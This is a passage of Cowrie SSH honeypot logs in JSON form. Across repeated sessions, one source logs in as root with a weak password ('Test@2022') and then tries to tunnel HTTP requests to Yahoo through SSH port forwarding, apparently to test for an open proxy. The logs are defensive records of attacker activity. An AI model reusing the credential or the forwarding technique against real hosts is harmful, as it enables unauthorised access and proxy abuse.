hange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:36.033971Z","src_ip":"213.209.150.239","session":"338cc8526cb0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:36.316524Z","src_ip":"213.209.150.239","session":"338cc8526cb0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":867,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:867","sensor":"my-vps","timestamp":"2025-08-26T01:03:36.374087Z","session":"338cc8526cb0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:36.430739Z","src_ip":"213.209.150.239","session":"338cc8526cb0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":10582,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10582","sensor":"my-vps","timestamp":"2025-08-26T01:03:36.586968Z","session":"338cc8526cb0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:36.643626Z","src_ip":"213.209.150.239","session":"338cc8526cb0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:36.701029Z","src_ip":"213.209.150.239","session":"338cc8526cb0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27755,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0f71a0cfe0e","protocol":"ssh","message":"New connection: 213.209.150.239:27755 (1.2.3.4:22) [session: f0f71a0cfe0e]","sensor":"my-vps","timestamp":"2025-08-26T01:03:36.747452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:36.757415Z","src_ip":"213.209.150.239","session":"f0f71a0cfe0e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:36.795285Z","src_ip":"213.209.150.239","session":"f0f71a0cfe0e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.030297Z","src_ip":"213.209.150.239","session":"f0f71a0cfe0e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":30848,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:30848","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.079051Z","session":"f0f71a0cfe0e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.126429Z","src_ip":"213.209.150.239","session":"f0f71a0cfe0e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":27702,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:27702","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.261688Z","session":"f0f71a0cfe0e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.309025Z","src_ip":"213.209.150.239","session":"f0f71a0cfe0e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.356979Z","src_ip":"213.209.150.239","session":"f0f71a0cfe0e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27803,"dst_ip":"1.2.3.4","dst_port":22,"session":"c64dcf8fa83b","protocol":"ssh","message":"New connection: 213.209.150.239:27803 (1.2.3.4:22) [session: c64dcf8fa83b]","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.402985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.403665Z","src_ip":"213.209.150.239","session":"c64dcf8fa83b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.450966Z","src_ip":"213.209.150.239","session":"c64dcf8fa83b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.684967Z","src_ip":"213.209.150.239","session":"c64dcf8fa83b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":2842,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:2842","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.732853Z","session":"c64dcf8fa83b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.779925Z","src_ip":"213.209.150.239","session":"c64dcf8fa83b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":26439,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26439","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.917467Z","session":"c64dcf8fa83b"}
{"eventid":"cowrie.session.closed","duration":31.660770177841187,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.928060Z","src_ip":"218.17.175.145","session":"36566e52cabb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:37.964616Z","src_ip":"213.209.150.239","session":"c64dcf8fa83b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.012854Z","src_ip":"213.209.150.239","session":"c64dcf8fa83b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27846,"dst_ip":"1.2.3.4","dst_port":22,"session":"aabe92878ccf","protocol":"ssh","message":"New connection: 213.209.150.239:27846 (1.2.3.4:22) [session: aabe92878ccf]","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.068752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.069924Z","src_ip":"213.209.150.239","session":"aabe92878ccf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.126807Z","src_ip":"213.209.150.239","session":"aabe92878ccf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.410038Z","src_ip":"213.209.150.239","session":"aabe92878ccf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":19598,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:19598","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.467512Z","session":"aabe92878ccf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.524362Z","src_ip":"213.209.150.239","session":"aabe92878ccf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":30186,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:30186","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.679096Z","session":"aabe92878ccf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.736640Z","src_ip":"213.209.150.239","session":"aabe92878ccf"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.794210Z","src_ip":"213.209.150.239","session":"aabe92878ccf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27910,"dst_ip":"1.2.3.4","dst_port":22,"session":"a05abc36ae9f","protocol":"ssh","message":"New connection: 213.209.150.239:27910 (1.2.3.4:22) [session: a05abc36ae9f]","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.840043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.840989Z","src_ip":"213.209.150.239","session":"a05abc36ae9f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:38.888249Z","src_ip":"213.209.150.239","session":"a05abc36ae9f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:39.122762Z","src_ip":"213.209.150.239","session":"a05abc36ae9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":11100,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:11100","sensor":"my-vps","timestamp":"2025-08-26T01:03:39.171050Z","session":"a05abc36ae9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:39.219145Z","src_ip":"213.209.150.239","session":"a05abc36ae9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":29638,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:29638","sensor":"my-vps","timestamp":"2025-08-26T01:03:39.353325Z","session":"a05abc36ae9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:39.400654Z","src_ip":"213.209.150.239","session":"a05abc36ae9f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:39.448475Z","src_ip":"213.209.150.239","session":"a05abc36ae9f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":27955,"dst_ip":"1.2.3.4","dst_port":22,"session":"e73de5f6e575","protocol":"ssh","message":"New connection: 213.209.150.239:27955 (1.2.3.4:22) [session: e73de5f6e575]","sensor":"my-vps","timestamp":"2025-08-26T01:03:39.494841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:39.495876Z","src_ip":"213.209.150.239","session":"e73de5f6e575"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:39.543241Z","src_ip":"213.209.150.239","session":"e73de5f6e575"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:39.778630Z","src_ip":"213.209.150.239","session":"e73de5f6e575"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":8830,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:8830","sensor":"my-vps","timestamp":"2025-08-26T01:03:39.827020Z","session":"e73de5f6e575"}
